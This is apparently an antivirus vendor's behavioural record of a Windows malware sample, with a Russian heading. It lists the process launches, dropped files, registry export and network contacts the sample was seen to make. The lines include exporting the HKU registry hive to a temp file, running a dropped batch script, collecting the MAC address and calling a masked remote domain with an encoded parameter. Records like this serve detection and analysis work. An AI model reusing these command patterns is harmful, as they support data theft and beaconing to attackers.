Техническая информация
- '%ProgramFiles%\Internet Explorer\IEXPLORE.EXE' "http://ad#.##stentrega.com/ok.php?a=#########################################"
- '<SYSTEM32>\fsutil.exe' file createnew "%TEMP%\thum.db" 666"
- '<SYSTEM32>\reg.exe' export HKU %TEMP%\~x
- '<SYSTEM32>\find.exe' "Device"
- '<SYSTEM32>\cmd.exe' /c ""%APPDATA%\codigo.bat" > NUL"
- '<SYSTEM32>\cmd.exe' /c getmac | <SYSTEM32>\find.exe "Device"
- '<SYSTEM32>\getmac.exe'
- %TEMP%\~x
- %HOMEPATH%\Local Settings\Temporary Internet Files\Content.IE5\KHMHGZ4F\ok[1].php
- %APPDATA%\codigo.bat
- 'ad#.##stentrega.com':80
- 'localhost':1037
- http://ad#.##stentrega.com/ok.php?a=#######################################
- DNS ASK ad#.##stentrega.com
- ClassName: 'MS_AutodialMonitor' WindowName: ''
- ClassName: 'MS_WebcheckMonitor' WindowName: ''
- ClassName: '' WindowName: ''
- ClassName: 'Shell_TrayWnd' WindowName: ''